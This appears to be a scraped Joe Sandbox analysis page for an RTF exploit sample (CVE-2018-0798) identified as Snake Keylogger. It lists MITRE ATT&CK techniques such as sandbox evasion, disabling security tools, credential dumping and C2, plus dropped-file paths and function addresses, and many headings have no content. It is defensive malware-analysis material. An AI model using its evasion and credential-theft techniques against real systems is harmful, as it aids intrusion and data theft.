Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\arinzezx[1].exe

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\AppData\Roaming\rinzearec84736.exe

C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf

Function 001D1BE8 Relevance: 1.4, Strings: 1, Instructions: 145
COMMON

Function 001D008C Relevance: .5, Instructions: 513
COMMON

Function 001D0519 Relevance: .5, Instructions: 509
COMMON

Function 001D1D96 Relevance: .3, Instructions: 252
COMMON

Function 001D1040 Relevance: .2, Instructions: 187
COMMON

Function 001DCB58 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
processCOMMON

Function 001DC730 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118
injectionCOMMON

Function 001DC8C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108
COMMON

Function 001DC5D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
memoryCOMMON

Function 001DC3E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
threadCOMMON

Function 001DC2C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
threadCOMMON

Function 04924E6D Relevance: 1.3, Strings: 1, Instructions: 18
COMMON

Function 049264F8 Relevance: .1, Instructions: 84
COMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre